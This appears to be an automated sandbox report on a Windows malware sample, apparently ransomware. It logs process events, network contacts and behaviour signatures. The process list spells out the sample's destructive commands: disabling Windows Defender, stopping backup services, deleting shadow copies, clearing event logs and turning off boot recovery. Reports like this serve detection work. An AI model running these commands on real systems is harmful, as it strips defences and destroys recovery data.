Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2504 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3736 wrote to memory of 768 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3736 wrote to memory of 768 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3012 wrote to memory of 3328 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3012 wrote to memory of 3328 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1284 wrote to memory of 1620 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1284 wrote to memory of 1620 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2208 wrote to memory of 592 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2804 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2804 wrote to memory of 2248 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1896 wrote to memory of 3544 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 3544 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4068 wrote to memory of 2660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4068 wrote to memory of 2660 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1344 wrote to memory of 2032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1344 wrote to memory of 2032 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 2504 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 728 wrote to memory of 2984 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 728 wrote to memory of 2984 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2504 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 3924 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 3924 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\sc.exe
PID 2504 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe
PID 2504 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12fd9" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12fd9" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12fd9" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/3736-115-0x0000000000000000-mapping.dmp

memory/768-116-0x0000000000000000-mapping.dmp

memory/3012-117-0x0000000000000000-mapping.dmp

memory/3328-118-0x0000000000000000-mapping.dmp

memory/1284-119-0x0000000000000000-mapping.dmp

memory/1620-120-0x0000000000000000-mapping.dmp

memory/2208-121-0x0000000000000000-mapping.dmp

memory/592-122-0x0000000000000000-mapping.dmp

memory/2804-123-0x0000000000000000-mapping.dmp

memory/2248-124-0x0000000000000000-mapping.dmp

memory/1896-125-0x0000000000000000-mapping.dmp

memory/3544-126-0x0000000000000000-mapping.dmp

memory/4068-127-0x0000000000000000-mapping.dmp

memory/2660-128-0x0000000000000000-mapping.dmp

memory/1344-129-0x0000000000000000-mapping.dmp

memory/2032-130-0x0000000000000000-mapping.dmp

memory/728-131-0x0000000000000000-mapping.dmp

memory/2984-132-0x0000000000000000-mapping.dmp

memory/3200-133-0x0000000000000000-mapping.dmp

memory/2372-134-0x0000000000000000-mapping.dmp

memory/912-135-0x0000000000000000-mapping.dmp

memory/1260-136-0x0000000000000000-mapping.dmp

memory/2060-137-0x0000000000000000-mapping.dmp

memory/2332-138-0x0000000000000000-mapping.dmp

memory/1780-139-0x0000000000000000-mapping.dmp

memory/3924-140-0x0000000000000000-mapping.dmp

memory/2084-141-0x0000000000000000-mapping.dmp

memory/2300-142-0x0000000000000000-mapping.dmp

memory/2904-143-0x0000000000000000-mapping.dmp

memory/3500-144-0x0000000000000000-mapping.dmp

memory/1100-145-0x0000000000000000-mapping.dmp

memory/1908-146-0x0000000000000000-mapping.dmp

memory/3084-147-0x0000000000000000-mapping.dmp

memory/3624-148-0x0000000000000000-mapping.dmp

memory/1776-149-0x0000000000000000-mapping.dmp

memory/3852-150-0x0000000000000000-mapping.dmp

memory/2128-151-0x0000000000000000-mapping.dmp

memory/1492-152-0x0000000000000000-mapping.dmp

memory/3328-153-0x0000000000000000-mapping.dmp

memory/1696-154-0x0000000000000000-mapping.dmp

memory/2308-155-0x0000000000000000-mapping.dmp

memory/508-156-0x0000000000000000-mapping.dmp

memory/4092-157-0x0000000000000000-mapping.dmp

memory/3668-158-0x0000000000000000-mapping.dmp

memory/1340-159-0x0000000000000000-mapping.dmp

memory/2912-160-0x0000000000000000-mapping.dmp

memory/1104-161-0x0000000000000000-mapping.dmp

memory/2632-162-0x0000000000000000-mapping.dmp

memory/3948-163-0x0000000000000000-mapping.dmp

memory/868-164-0x0000000000000000-mapping.dmp

memory/2224-165-0x0000000000000000-mapping.dmp

memory/2148-166-0x0000000000000000-mapping.dmp

memory/1772-167-0x0000000000000000-mapping.dmp

memory/1936-168-0x0000000000000000-mapping.dmp

memory/2240-169-0x0000000000000000-mapping.dmp

memory/2572-170-0x0000000000000000-mapping.dmp

memory/2952-171-0x0000000000000000-mapping.dmp

memory/824-172-0x0000000000000000-mapping.dmp

memory/1808-173-0x0000000000000000-mapping.dmp

memory/3228-174-0x0000000000000000-mapping.dmp

memory/2220-175-0x0000000000000000-mapping.dmp

memory/3064-176-0x0000000000000000-mapping.dmp

memory/2644-177-0x0000000000000000-mapping.dmp

memory/3848-178-0x0000000000000000-mapping.dmp

memory/1132-179-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-180-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-181-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-182-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-183-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-184-0x000001945B9C0000-0x000001945B9E2000-memory.dmp

memory/1132-185-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-186-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-187-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-188-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-189-0x0000019476070000-0x00000194760E6000-memory.dmp

memory/1132-190-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-194-0x0000019473E90000-0x0000019473E92000-memory.dmp

memory/1132-195-0x0000019473E93000-0x0000019473E95000-memory.dmp

memory/1132-196-0x0000019473E96000-0x0000019473E98000-memory.dmp

memory/1132-217-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/1132-218-0x0000019459F90000-0x0000019459F92000-memory.dmp

memory/2056-220-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2056-221-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-222-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-223-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-224-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-225-0x0000013CE9DC0000-0x0000013CE9DE2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f9706913217c1dd037d5cfdff5eab3a
SHA1 68fd09dc8da2c9519454e985b70d7fb2206e1bdd
SHA256 0432db16265d3d0e4c0abd691e771c95a007b9b5d31b3662a70893cae0493cb8
SHA512 58f936800fdb4e1630048042d9e2c545f7678dd34849cef726062de198b3f2c997f49d3703f6b6acdc441011f2575f499033057cf3a884d413017855663ec8ac

memory/2056-227-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-228-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-229-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-230-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/2056-231-0x0000013CEC080000-0x0000013CEC0F6000-memory.dmp

memory/2056-232-0x0000013CCFFC0000-0x0000013CCFFC2000-memory.dmp

memory/1132-236-0x0000019473E98000-0x0000019473E99000-memory.dmp

memory/2056-237-0x0000013CE9EA0000-0x0000013CE9EA2000-memory.dmp

memory/2056-238-0x0000013CE9EA3000-0x0000013CE9EA5000-memory.dmp

memory/2056-240-0x0000013CE9EA6000-0x0000013CE9EA8000-memory.dmp

memory/2056-262-0x0000013CE9EA8000-0x0000013CE9EA9000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-12 19:25

Reported

2022-01-12 19:31

Platform

win7-en-20211208

Max time kernel

44s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
